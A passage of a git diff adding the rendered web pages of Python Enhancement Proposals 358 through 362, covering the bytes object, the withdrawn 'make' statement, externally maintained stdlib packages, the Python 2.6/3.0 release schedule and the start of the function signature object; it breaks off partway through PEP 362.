  • Python 3k will have a much different I/O subsystem. Deciding +how that I/O subsystem will work and interact with the bytes +object is out of the scope of this PEP. The expectation however +is that binary I/O will read and write bytes, while text I/O +will read strings. Since the bytes type supports the buffer +interface, the existing binary I/O operations in Python 2.6 will +support bytes objects.
  • +
  • It has been suggested that a special method named .__bytes__() +be added to the language to allow objects to be converted into +byte arrays. This decision is out of scope.
  • +
  • A bytes literal of the form b"..." is also proposed. This is +the subject of PEP 3112.
  • +
+
+
+

Open Issues

+
    +
  • The .decode() method is redundant since a bytes object b can +also be decoded by calling unicode(b, <encoding>) (in 2.6) or +str(b, <encoding>) (in 3.0). Do we need encode/decode methods +at all? In a sense the spelling using a constructor is cleaner.
  • +
  • Need to specify the methods still more carefully.
  • +
  • Pickling and marshalling support need to be specified.
  • +
  • Should all those list methods really be implemented?
  • +
  • A case could be made for supporting .ljust(), .rjust(), +.center() with a mandatory second argument.
  • +
  • A case could be made for supporting .split() with a mandatory +argument.
  • +
  • A case could even be made for supporting .islower(), .isupper(), +.isspace(), .isalpha(), .isalnum(), .isdigit() and the +corresponding conversions (.lower() etc.), using the ASCII +definitions for letters, digits and whitespace. If this is +accepted, the cases for .ljust(), .rjust(), .center() and +.split() become much stronger, and they should have default +arguments as well, using an ASCII space or all ASCII whitespace +(for .split()).
  • +
+
+
+

Frequently Asked Questions

+

Q: Why have the optional encoding argument when the encode method of +Unicode objects does the same thing?

+

A: In the current version of Python, the encode method returns a str +object and we cannot change that without breaking code. The +construct bytes(s.encode(...)) is expensive because it has to +copy the byte sequence multiple times. Also, Python generally +provides two ways of converting an object of type A into an +object of type B: ask an A instance to convert itself to a B, or +ask the type B to create a new instance from an A. Depending on +what A and B are, both APIs make sense; sometimes reasons of +decoupling require that A can’t know about B, in which case you +have to use the latter approach; sometimes B can’t know about A, +in which case you have to use the former.

+

Q: Why does bytes ignore the encoding argument if the initializer is +a str? (This only applies to 2.6.)

+

A: There is no sane meaning that the encoding can have in that case. +str objects are byte arrays and they know nothing about the +encoding of character data they contain. We need to assume that +the programmer has provided a str object that already uses the +desired encoding. If you need something other than a pure copy of +the bytes then you need to first decode the string. For example:

+
bytes(s.decode(encoding1), encoding2)
+
+
+

Q: Why not have the encoding argument default to Latin-1 (or some +other encoding that covers the entire byte range) rather than +ASCII?

+

A: The system default encoding for Python is ASCII. It seems least +confusing to use that default. Also, in Py3k, using Latin-1 as +the default might not be what users expect. For example, they +might prefer a Unicode encoding. Any default will not always +work as expected. At least ASCII will complain loudly if you try +to encode non-ASCII data.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0358.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0359/index.html b/pep-0359/index.html new file mode 100644 index 00000000000..b553491e576 --- /dev/null +++ b/pep-0359/index.html @@ -0,0 +1,707 @@ + + + + + + + + PEP 359 – The “make” Statement | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 359 – The “make” Statement

+
+
Author:
+
Steven Bethard <steven.bethard at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
05-Apr-2006
+
Python-Version:
+
2.6
+
Post-History:
+
05-Apr-2006, 06-Apr-2006, 13-Apr-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a generalization of the class-declaration syntax, +the make statement. The proposed syntax and semantics parallel +the syntax for class definition, and so:

+
make <callable> <name> <tuple>:
+    <block>
+
+
+

is translated into the assignment:

+
<name> = <callable>("<name>", <tuple>, <namespace>)
+
+
+

where <namespace> is the dict created by executing <block>. +This is mostly syntactic sugar for:

+
class <name> <tuple>:
+    __metaclass__ = <callable>
+    <block>
+
+
+

and is intended to help more clearly express the intent of the +statement when something other than a class is being created. Of +course, other syntax for such a statement is possible, but it is hoped +that by keeping a strong parallel to the class statement, an +understanding of how classes and metaclasses work will translate into +an understanding of how the make-statement works as well.

+

The PEP is based on a suggestion [1] from Michele Simionato on the +python-dev list.

+
+
+

Withdrawal Notice

+

This PEP was withdrawn at Guido’s request [2]. Guido didn’t like it, +and in particular didn’t like how the property use-case puts the +instance methods of a property at a different level than other +instance methods and requires fixed names for the property functions.

+
+
+

Motivation

+

Class statements provide two nice facilities to Python:

+
    +
  1. They execute a block of statements and provide the resulting +bindings as a dict to the metaclass.
  2. +
  3. They encourage DRY (don’t repeat yourself) by allowing the class +being created to know the name it is being assigned.
  4. +
+

Thus in a simple class statement like:

+
class C(object):
+    x = 1
+    def foo(self):
+        return 'bar'
+
+
+

the metaclass (type) gets called with something like:

+
C = type('C', (object,), {'x':1, 'foo':<function foo at ...>})
+
+
+

The class statement is just syntactic sugar for the above assignment +statement, but clearly a very useful sort of syntactic sugar. It +avoids not only the repetition of C, but also simplifies the +creation of the dict by allowing it to be expressed as a series of +statements.

+

Historically, type instances (a.k.a. class objects) have been the +only objects blessed with this sort of syntactic support. The make +statement aims to extend this support to other sorts of objects where +such syntax would also be useful.

+
+

Example: simple namespaces

+

Let’s say I have some attributes in a module that I access like:

+
mod.thematic_roletype
+mod.opinion_roletype
+
+mod.text_format
+mod.html_format
+
+
+

and since “Namespaces are one honking great idea”, I’d like to be able +to access these attributes instead as:

+
mod.roletypes.thematic
+mod.roletypes.opinion
+
+mod.format.text
+mod.format.html
+
+
+

I currently have two main options:

+
    +
  1. Turn the module into a package, turn roletypes and format +into submodules, and move the attributes to the submodules.
  2. +
  3. Create roletypes and format classes, and move the +attributes to the classes.
  4. +
+

The former is a fair chunk of refactoring work, and produces two tiny +modules without much content. The latter keeps the attributes local +to the module, but creates classes when there is no intention of ever +creating instances of those classes.

+

In situations like this, it would be nice to simply be able to declare +a “namespace” to hold the few attributes. With the new make +statement, I could introduce my new namespaces with something like:

+
make namespace roletypes:
+    thematic = ...
+    opinion = ...
+
+make namespace format:
+    text = ...
+    html = ...
+
+
+

and keep my attributes local to the module without making classes that +are never intended to be instantiated. One definition of namespace +that would make this work is:

+
class namespace(object):
+    def __init__(self, name, args, kwargs):
+        self.__dict__.update(kwargs)
+
+
+

Given this definition, at the end of the make-statements above, +roletypes and format would be namespace instances.

+
+
+

Example: GUI objects

+

In GUI toolkits, objects like frames and panels are often associated +with attributes and functions. With the make-statement, code that +looks something like:

+
root = Tkinter.Tk()
+frame = Tkinter.Frame(root)
+frame.pack()
+def say_hi():
+    print "hi there, everyone!"
+hi_there = Tkinter.Button(frame, text="Hello", command=say_hi)
+hi_there.pack(side=Tkinter.LEFT)
+root.mainloop()
+
+
+

could be rewritten to group the Button’s function with its +declaration:

+
root = Tkinter.Tk()
+frame = Tkinter.Frame(root)
+frame.pack()
+make Tkinter.Button hi_there(frame):
+    text = "Hello"
+    def command():
+        print "hi there, everyone!"
+hi_there.pack(side=Tkinter.LEFT)
+root.mainloop()
+
+
+
+
+

Example: custom descriptors

+

Since descriptors are used to customize access to an attribute, it’s +often useful to know the name of that attribute. Current Python +doesn’t give an easy way to find this name and so a lot of custom +descriptors, like Ian Bicking’s setonce descriptor [3], have to hack +around this somehow. With the make-statement, you could create a +setonce attribute like:

+
class A(object):
+    ...
+    make setonce x:
+        "A's x attribute"
+    ...
+
+
+

where the setonce descriptor would be defined like:

+
class setonce(object):
+
+    def __init__(self, name, args, kwargs):
+        self._name = '_setonce_attr_%s' % name
+        self.__doc__ = kwargs.pop('__doc__', None)
+
+    def __get__(self, obj, type=None):
+        if obj is None:
+            return self
+        return getattr(obj, self._name)
+
+    def __set__(self, obj, value):
+        try:
+            getattr(obj, self._name)
+        except AttributeError:
+            setattr(obj, self._name, value)
+        else:
+            raise AttributeError("Attribute already set")
+
+    def set(self, obj, value):
+        setattr(obj, self._name, value)
+
+    def __delete__(self, obj):
+        delattr(obj, self._name)
+
+
+

Note that unlike the original implementation, the private attribute +name is stable since it uses the name of the descriptor, and therefore +instances of class A are pickleable.

+
+
+

Example: property namespaces

+

Python’s property type takes three function arguments and a docstring +argument which, though relevant only to the property, must be declared +before it and then passed as arguments to the property call, e.g.:

+
class C(object):
+    ...
+    def get_x(self):
+        ...
+    def set_x(self):
+        ...
+    x = property(get_x, set_x, "the x of the frobulation")
+
+
+

This issue has been brought up before, and Guido [4] and others [5] +have briefly mused over alternate property syntaxes to make declaring +properties easier. With the make-statement, the following syntax +could be supported:

+
class C(object):
+    ...
+    make block_property x:
+        '''The x of the frobulation'''
+        def fget(self):
+            ...
+        def fset(self):
+            ...
+
+
+

with the following definition of block_property:

+
def block_property(name, args, block_dict):
+    fget = block_dict.pop('fget', None)
+    fset = block_dict.pop('fset', None)
+    fdel = block_dict.pop('fdel', None)
+    doc = block_dict.pop('__doc__', None)
+    assert not block_dict
+    return property(fget, fset, fdel, doc)
+
+
+
+
+

Example: interfaces

+

Guido [6] and others have occasionally suggested introducing +interfaces into python. Most suggestions have offered syntax along +the lines of:

+
interface IFoo:
+    """Foo blah blah"""
+
+    def fumble(name, count):
+        """docstring"""
+
+
+

but since there is currently no way in Python to declare an interface +in this manner, most implementations of Python interfaces use class +objects instead, e.g. Zope’s:

+
class IFoo(Interface):
+    """Foo blah blah"""
+
+    def fumble(name, count):
+        """docstring"""
+
+
+

With the new make-statement, these interfaces could instead be +declared as:

+
make Interface IFoo:
+    """Foo blah blah"""
+
+    def fumble(name, count):
+        """docstring"""
+
+
+

which makes the intent (that this is an interface, not a class) much +clearer.

+
+
+
+

Specification

+

Python will translate a make-statement:

+
make <callable> <name> <tuple>:
+    <block>
+
+
+

into the assignment:

+
<name> = <callable>("<name>", <tuple>, <namespace>)
+
+
+

where <namespace> is the dict created by executing <block>. +The <tuple> expression is optional; if not present, an empty tuple +will be assumed.

+

A patch is available implementing these semantics [7].

+

The make-statement introduces a new keyword, make. Thus in Python +2.6, the make-statement will have to be enabled using from +__future__ import make_statement.

+
+
+

Open Issues

+
+

Keyword

+

Does the make keyword break too much code? Originally, the make +statement used the keyword create (a suggestion due to Alyssa +Coghlan). However, investigations into the standard library [8] and +Zope+Plone code [9] revealed that create would break a lot more +code, so make was adopted as the keyword instead. However, there +are still a few instances where make would break code. Is there a +better keyword for the statement?

+

Some possible keywords and their counts in the standard library (plus +some installed packages):

+
    +
  • make - 2 (both in tests)
  • +
  • create - 19 (including existing function in imaplib)
  • +
  • build - 83 (including existing class in distutils.command.build)
  • +
  • construct - 0
  • +
  • produce - 0
  • +
+
+
+

The make-statement as an alternate constructor

+

Currently, there are not many functions which have the signature +(name, args, kwargs). That means that something like:

+
make dict params:
+    x = 1
+    y = 2
+
+
+

is currently impossible because the dict constructor has a different +signature. Does this sort of thing need to be supported? One +suggestion, by Carl Banks, would be to add a __make__ magic method +that if found would be called instead of __call__. For types, +the __make__ method would be identical to __call__ and thus +unnecessary, but dicts could support the make-statement by defining a +__make__ method on the dict type that looks something like:

+
def __make__(cls, name, args, kwargs):
+    return cls(**kwargs)
+
+
+

Of course, rather than adding another magic method, the dict type +could just grow a classmethod something like dict.fromblock that +could be used like:

+
make dict.fromblock params:
+    x = 1
+    y = 2
+
+
+

So the question is, will many types want to use the make-statement as +an alternate constructor? And if so, does that alternate constructor +need to have the same name as the original constructor?

+
+
+

Customizing the dict in which the block is executed

+

Should users of the make-statement be able to determine in which dict +object the code is executed? This would allow the make-statement to +be used in situations where a normal dict object would not suffice, +e.g. if order and repeated names must be allowed. Allowing this sort +of customization could allow XML to be written without repeating +element names, and with nesting of make-statements corresponding to +nesting of XML elements:

+
make Element html:
+    make Element body:
+        text('before first h1')
+        make Element h1:
+            attrib(style='first')
+            text('first h1')
+            tail('after first h1')
+        make Element h1:
+            attrib(style='second')
+            text('second h1')
+            tail('after second h1')
+
+
+

If the make-statement tried to get the dict in which to execute its +block by calling the callable’s __make_dict__ method, the +following code would allow the make-statement to be used as above:

+
class Element(object):
+
+    class __make_dict__(dict):
+
+        def __init__(self, *args, **kwargs):
+            self._super = super(Element.__make_dict__, self)
+            self._super.__init__(*args, **kwargs)
+            self.elements = []
+            self.text = None
+            self.tail = None
+            self.attrib = {}
+
+        def __getitem__(self, name):
+            try:
+                return self._super.__getitem__(name)
+            except KeyError:
+                if name in ['attrib', 'text', 'tail']:
+                    return getattr(self, 'set_%s' % name)
+                else:
+                    return globals()[name]
+
+        def __setitem__(self, name, value):
+            self._super.__setitem__(name, value)
+            self.elements.append(value)
+
+        def set_attrib(self, **kwargs):
+            self.attrib = kwargs
+
+        def set_text(self, text):
+            self.text = text
+
+        def set_tail(self, text):
+            self.tail = text
+
+    def __new__(cls, name, args, edict):
+        get_element = etree.ElementTree.Element
+        result = get_element(name, attrib=edict.attrib)
+        result.text = edict.text
+        result.tail = edict.tail
+        for element in edict.elements:
+            result.append(element)
+        return result
+
+
+

Note, however, that the code to support this is somewhat fragile – +it has to magically populate the namespace with attrib, text +and tail, and it assumes that every name binding inside the make +statement body is creating an Element. As it stands, this code would +break with the introduction of a simple for-loop to any one of the +make-statement bodies, because the for-loop would bind a name to a +non-Element object. This could be worked around by adding some sort +of isinstance check or attribute examination, but this still results +in a somewhat fragile solution.

+

It has also been pointed out that the with-statement can provide +equivalent nesting with a much more explicit syntax:

+
with Element('html') as html:
+    with Element('body') as body:
+        body.text = 'before first h1'
+        with Element('h1', style='first') as h1:
+            h1.text = 'first h1'
+            h1.tail = 'after first h1'
+        with Element('h1', style='second') as h1:
+            h1.text = 'second h1'
+            h1.tail = 'after second h1'
+
+
+

And if the repetition of the element names here is too much of a DRY +violation, it is also possible to eliminate all as-clauses except for +the first by adding a few methods to Element. [10]

+

So are there real use-cases for executing the block in a dict of a +different type? And if so, should the make-statement be extended to +support them?

+
+
+
+

Optional Extensions

+
+

Remove the make keyword

+

It might be possible to remove the make keyword so that such +statements would begin with the callable being called, e.g.:

+
namespace ns:
+    badger = 42
+    def spam():
+        ...
+
+interface C(...):
+    ...
+
+
+

However, almost all other Python statements begin with a keyword, and +removing the keyword would make it harder to look up this construct in +the documentation. Additionally, this would add some complexity in +the grammar and so far I (Steven Bethard) have not been able to +implement the feature without the keyword.

+
+
+

Removing __metaclass__ in Python 3000

+

As a side-effect of its generality, the make-statement mostly +eliminates the need for the __metaclass__ attribute in class +objects. Thus in Python 3000, instead of:

+
class <name> <bases-tuple>:
+    __metaclass__ = <metaclass>
+    <block>
+
+
+

metaclasses could be supported by using the metaclass as the callable +in a make-statement:

+
make <metaclass> <name> <bases-tuple>:
+    <block>
+
+
+

Removing the __metaclass__ hook would simplify the BUILD_CLASS +opcode a bit.

+
+
+

Removing class statements in Python 3000

+

In the most extreme application of make-statements, the class +statement itself could be deprecated in favor of make type +statements.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0359.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0360/index.html b/pep-0360/index.html new file mode 100644 index 00000000000..6a9c100c8c3 --- /dev/null +++ b/pep-0360/index.html @@ -0,0 +1,251 @@ + + + + + + + + PEP 360 – Externally Maintained Packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 360 – Externally Maintained Packages

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
30-May-2006
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Warning

+

No new modules are to be added to this PEP. It has been +deemed dangerous to codify external maintenance of any +code checked into Python’s code repository. Code +contributors should expect Python’s development +methodology to be used for any and all code checked into +Python’s code repository.

+
+
+

Abstract

+

There are many great pieces of Python software developed outside of +the Python standard library (a.k.a., the “stdlib”). Sometimes it +makes sense to incorporate these externally maintained packages into +the stdlib in order to fill a gap in the tools provided by Python.

+

But by having the packages maintained externally it means Python’s +developers do not have direct control over the packages’ evolution and +maintenance. Some package developers prefer to have bug reports and +patches go through them first instead of being directly applied to +Python’s repository.

+

This PEP is meant to record details of packages in the stdlib that are +maintained outside of Python’s repository. Specifically, it is meant +to keep track of any specific maintenance needs for each package. It +should be mentioned that changes needed in order to fix bugs and keep +the code running on all of Python’s supported platforms will be done +directly in Python’s repository without worrying about going through +the contact developer. This is so that Python itself is not held up +by a single bug and allows the whole process to scale as needed.

+

It also is meant to allow people to know which version of a package is +released with which version of Python.

+
+
+

Externally Maintained Packages

+

The section title is the name of the package as it is known outside of +the Python standard library. The “standard library name” is what the +package is named within Python. The “contact person” is the Python +developer in charge of maintaining the package. The “synchronisation +history” lists what external version of the package was included in +each version of Python (if different from the previous Python +release).

+
+

ElementTree

+
+
Web site:
+
http://effbot.org/zone/element-index.htm
+
Standard library name:
+
xml.etree
+
Contact person:
+
Fredrik Lundh
+
+

Fredrik has ceded ElementTree maintenance to the core Python development +team [1].

+
+
+

Expat XML parser

+
+
Web site:
+
http://www.libexpat.org/
+
Standard library name:
+
N/A (this refers to the parser itself, and not the Python +bindings)
+
Contact person:
+
None
+
+
+
+

Optik

+
+
Web site:
+
http://optik.sourceforge.net/
+
Standard library name:
+
optparse
+
Contact person:
+
Greg Ward
+
+

External development seems to have ceased. For new applications, optparse +itself has been largely superseded by argparse.

+
+
+

wsgiref

+
+
Web site:
+
None
+
Standard library name:
+
wsgiref
+
Contact Person:
+
Phillip J. Eby
+
+

This module is maintained in the standard library, but significant bug +reports and patches should pass through the Web-SIG mailing list +[2] for discussion.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0360.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0361/index.html b/pep-0361/index.html new file mode 100644 index 00000000000..9fcaf98fdda --- /dev/null +++ b/pep-0361/index.html @@ -0,0 +1,372 @@ + + + + + + + + PEP 361 – Python 2.6 and 3.0 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 361 – Python 2.6 and 3.0 Release Schedule

+
+
Author:
+
Neal Norwitz, Barry Warsaw
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
29-Jun-2006
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+
17-Mar-2008
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 2.6 and 3.0. The schedule primarily concerns itself with +PEP-sized items. Small features may be added up to and including +the first beta release. Bugs may be fixed until the final +release.

+

There will be at least two alpha releases, two beta releases, and +one release candidate. The releases are planned for October 2008.

+

Python 2.6 is not only the next advancement in the Python 2 +series, it is also a transitional release, helping developers +begin to prepare their code for Python 3.0. As such, many +features are being backported from Python 3.0 to 2.6. Thus, it +makes sense to release both versions in at the same time. The +precedence for this was set with the Python 1.6 and 2.0 release.

+

Until rc, we will be releasing Python 2.6 and 3.0 in lockstep, on +a monthly release cycle. The releases will happen on the first +Wednesday of every month through the beta testing cycle. Because +Python 2.6 is ready sooner, and because we have outside deadlines +we’d like to meet, we’ve decided to split the rc releases. Thus +Python 2.6 final is currently planned to come out two weeks before +Python 3.0 final.

+
+
+

Release Manager and Crew

+
    +
  • 2.6/3.0 Release Manager: Barry Warsaw
  • +
  • Windows installers: Martin v. Loewis
  • +
  • Mac installers: Ronald Oussoren
  • +
  • Documentation: Georg Brandl
  • +
  • RPMs: Sean Reifschneider
  • +
+
+
+

Release Lifespan

+

Python 3.0 is no longer being maintained for any purpose.

+

Python 2.6.9 is the final security-only source-only maintenance +release of the Python 2.6 series. With its release on October 29, +2013, all official support for Python 2.6 has ended. Python 2.6 +is no longer being maintained for any purpose.

+
+
+

Release Schedule

+
    +
  • Feb 29 2008: Python 2.6a1 and 3.0a3 are released
  • +
  • Apr 02 2008: Python 2.6a2 and 3.0a4 are released
  • +
  • May 08 2008: Python 2.6a3 and 3.0a5 are released
  • +
  • Jun 18 2008: Python 2.6b1 and 3.0b1 are released
  • +
  • Jul 17 2008: Python 2.6b2 and 3.0b2 are released
  • +
  • Aug 20 2008: Python 2.6b3 and 3.0b3 are released
  • +
  • Sep 12 2008: Python 2.6rc1 is released
  • +
  • Sep 17 2008: Python 2.6rc2 and 3.0rc1 released
  • +
  • Oct 01 2008: Python 2.6 final released
  • +
  • Nov 06 2008: Python 3.0rc2 released
  • +
  • Nov 21 2008: Python 3.0rc3 released
  • +
  • Dec 03 2008: Python 3.0 final released
  • +
  • Dec 04 2008: Python 2.6.1 final released
  • +
  • Apr 14 2009: Python 2.6.2 final released
  • +
  • Oct 02 2009: Python 2.6.3 final released
  • +
  • Oct 25 2009: Python 2.6.4 final released
  • +
  • Mar 19 2010: Python 2.6.5 final released
  • +
  • Aug 24 2010: Python 2.6.6 final released
  • +
  • Jun 03 2011: Python 2.6.7 final released (security-only)
  • +
  • Apr 10 2012: Python 2.6.8 final released (security-only)
  • +
  • Oct 29 2013: Python 2.6.9 final released (security-only)
  • +
+
+
+

Completed features for 3.0

+

See PEP 3000 and PEP 3100 for details on the +Python 3.0 project.

+
+
+

Completed features for 2.6

+

PEPs:

+
    +
  • PEP 352: Raising a string exception now triggers a TypeError. +Attempting to catch a string exception raises DeprecationWarning. +BaseException.message has been deprecated.
  • +
  • PEP 358: The “bytes” Object
  • +
  • PEP 366: Main module explicit relative imports
  • +
  • PEP 370: Per user site-packages directory
  • +
  • PEP 3112: Bytes literals in Python 3000
  • +
  • PEP 3127: Integer Literal Support and Syntax
  • +
  • PEP 371: Addition of the multiprocessing package
  • +
+

New modules in the standard library:

+
    +
  • json
  • +
  • new enhanced turtle module
  • +
  • ast
  • +
+

Deprecated modules and functions in the standard library:

+
    +
  • buildtools
  • +
  • cfmfile
  • +
  • commands.getstatus()
  • +
  • macostools.touched()
  • +
  • md5
  • +
  • MimeWriter
  • +
  • mimify
  • +
  • popen2, os.popen[234]()
  • +
  • posixfile
  • +
  • sets
  • +
  • sha
  • +
+

Modules removed from the standard library:

+
    +
  • gopherlib
  • +
  • rgbimg
  • +
  • macfs
  • +
+

Warnings for features removed in Py3k:

+
    +
  • builtins: apply, callable, coerce, dict.has_key, execfile, +reduce, reload
  • +
  • backticks and <>
  • +
  • float args to xrange
  • +
  • coerce and all its friends
  • +
  • comparing by default comparison
  • +
  • {}.has_key()
  • +
  • file.xreadlines
  • +
  • softspace removal for print() function
  • +
  • removal of modules because of PEP 4/PEP 3100/PEP 3108
  • +
+

Other major features:

+
    +
  • with/as will be keywords
  • +
  • a __dir__() special method to control dir() was added [1]
  • +
  • AtheOS support stopped.
  • +
  • warnings module implemented in C
  • +
  • compile() takes an AST and can convert to byte code
  • +
+
+
+

Possible features for 2.6

+

New features should be implemented prior to alpha2, particularly +any C modifications or behavioral changes. New features must be +implemented prior to beta1 or will require Release Manager approval.

+

The following PEPs are being worked on for inclusion in 2.6: None.

+

Each non-trivial feature listed here that is not a PEP must be +discussed on python-dev. Other enhancements include:

+
    +
  • distutils replacement (requires a PEP)
  • +
+

New modules in the standard library:

+ +

PJE’s withdrawal from 2.5 for inclusion in 2.6: +https://mail.python.org/pipermail/python-dev/2006-April/064145.html

+

Modules to gain a DeprecationWarning (as specified for Python 2.6 +or through negligence):

+
    +
  • rfc822
  • +
  • mimetools
  • +
  • multifile
  • +
  • compiler package (or a Py3K warning instead?)
  • +
  • Convert Parser/*.c to use the C warnings module rather than printf
  • +
  • Add warnings for Py3k features removed:
      +
    • __getslice__/__setslice__/__delslice__
    • +
    • float args to PyArgs_ParseTuple
    • +
    • __cmp__?
    • +
    • other comparison changes?
    • +
    • int division?
    • +
    • All PendingDeprecationWarnings (e.g. exceptions)
    • +
    • using zip() result as a list
    • +
    • the exec statement (use function syntax)
    • +
    • function attributes that start with func_* (should use __*__)
    • +
    • the L suffix for long literals
    • +
    • renaming of __nonzero__ to __bool__
    • +
    • multiple inheritance with classic classes? (MRO might change)
    • +
    • properties and classic classes? (instance attrs shadow property)
    • +
    +
  • +
  • use __bool__ method if available and there’s no __nonzero__
  • +
  • Check the various bits of code in Demo/ and Tools/ all still work, +update or remove the ones that don’t.
  • +
  • All modules in Modules/ should be updated to be ssize_t clean.
  • +
  • All of Python (including Modules/) should compile cleanly with g++
  • +
  • Start removing deprecated features and generally moving towards Py3k
  • +
  • Replace all old style tests (operate on import) with unittest or docttest
  • +
  • Add tests for all untested modules
  • +
  • Document undocumented modules/features
  • +
  • bdist_deb in distutils package +https://mail.python.org/pipermail/python-dev/2006-February/060926.html
  • +
  • bdist_egg in distutils package
  • +
  • pure python pgen module +(Owner: Guido) +Deferral to 2.6: +https://mail.python.org/pipermail/python-dev/2006-April/064528.html
  • +
  • Remove the fpectl module?
  • +
+
+
+

Deferred until 2.7

+

None

+
+
+

Open issues

+

How should import warnings be handled?

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0361.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0362/index.html b/pep-0362/index.html new file mode 100644 index 00000000000..3fc8f4cf844 --- /dev/null +++ b/pep-0362/index.html @@ -0,0 +1,690 @@ + + + + + + + + PEP 362 – Function Signature Object | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 362 – Function Signature Object

+
+
Author:
+
Brett Cannon <brett at python.org>, Jiwon Seo <seojiwon at gmail.com>, +Yury Selivanov <yury at edgedb.com>, Larry Hastings <larry at hastings.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
21-Aug-2006
+
Python-Version:
+
3.3
+
Post-History:
+
04-Jun-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Python has always supported powerful introspection capabilities, +including introspecting functions and methods (for the rest of +this PEP, “function” refers to both functions and methods). By +examining a function object you can fully reconstruct the function’s +signature. Unfortunately this information is stored in an inconvenient +manner, and is spread across a half-dozen deeply nested attributes.

+

This PEP proposes a new representation for function signatures. +The new representation contains all necessary information about a function +and its parameters, and makes introspection easy and straightforward.

+

However, this object does not replace the existing function +metadata, which is used by Python itself to execute those +functions. The new metadata object is intended solely to make +function introspection easier for Python programmers.

+
+
+

Signature Object

+

A Signature object represents the call signature of a function and +its return annotation. For each parameter accepted by the function +it stores a Parameter object in its parameters collection.

+

A Signature object has the following public attributes and methods:

+
    +
  • +
    return_annotation : object
    The “return” annotation for the function. If the function +has no “return” annotation, this attribute is set to +Signature.empty.
    +
    +
  • +
  • +
    parameters : OrderedDict
    An ordered mapping of parameters’ names to the corresponding +Parameter objects.
    +
    +
  • +
  • +
    bind(*args, **kwargs) -> BoundArguments
    Creates a mapping from positional and keyword arguments to +parameters. Raises a TypeError if the passed arguments do +not match the signature.
    +
    +
  • +
  • +
    bind_partial(*args, **kwargs) -> BoundArguments
    Works the same way as bind(), but allows the omission +of some required arguments (mimics functools.partial +behavior.) Raises a TypeError if the passed arguments do +not match the signature.
    +
    +
  • +
  • +
    replace(parameters=<optional>, *, return_annotation=<optional>) -> Signature
    Creates a new Signature instance based on the instance +replace was invoked on. It is possible to pass different +parameters and/or return_annotation to override the +corresponding properties of the base signature. To remove +return_annotation from the copied Signature, pass in +Signature.empty.

    Note that the ‘=<optional>’ notation, means that the argument is +optional. This notation applies to the rest of this PEP.

    +
    +
    +
  • +
+

Signature objects are immutable. Use Signature.replace() to +make a modified copy:

+
>>> def foo() -> None:
+...     pass
+>>> sig = signature(foo)
+
+>>> new_sig = sig.replace(return_annotation="new return annotation")
+>>> new_sig is not sig
+True
+>>> new_sig.return_annotation != sig.return_annotation
+True
+>>> new_sig.parameters == sig.parameters
+True
+
+>>> new_sig = new_sig.replace(return_annotation=new_sig.empty)
+>>> new_sig.return_annotation is Signature.empty
+True
+
+
+

There are two ways to instantiate a Signature class:

+
    +
  • +
    Signature(parameters=<optional>, *, return_annotation=Signature.empty)
    Default Signature constructor. Accepts an optional sequence +of Parameter objects, and an optional return_annotation. +Parameters sequence is validated to check that there are no +parameters with duplicate names, and that the parameters +are in the right order, i.e. positional-only first, then +positional-or-keyword, etc.
    +
    +
  • +
  • +
    Signature.from_function(function)
    Returns a Signature object reflecting the signature of the +function passed in.
    +
    +
  • +
+

It’s possible to test Signatures for equality. Two signatures are +equal when their parameters are equal, their positional and +positional-only parameters appear in the same order, and they +have equal return annotations.

+

Changes to the Signature object, or to any of its data members, +do not affect the function itself.

+

Signature also implements __str__:

+
>>> str(Signature.from_function((lambda *args: None)))
+'(*args)'
+
+>>> str(Signature())
+'()'
+
+
+
+
+

Parameter Object

+

Python’s expressive syntax means functions can accept many different +kinds of parameters with many subtle semantic differences. We +propose a rich Parameter object designed to represent any possible +function parameter.

+

A Parameter object has the following public attributes and methods:

+
    +
  • +
    name : str
    The name of the parameter as a string. Must be a valid +python identifier name (with the exception of POSITIONAL_ONLY +parameters, which can have it set to None.)
    +
    +
  • +
  • +
    default : object
    The default value for the parameter. If the parameter has no +default value, this attribute is set to Parameter.empty.
    +
    +
  • +
  • +
    annotation : object
    The annotation for the parameter. If the parameter has no +annotation, this attribute is set to Parameter.empty.
    +
    +
  • +
  • +
    kind
    Describes how argument values are bound to the parameter. +Possible values:
      +
    • Parameter.POSITIONAL_ONLY - value must be supplied +as a positional argument.

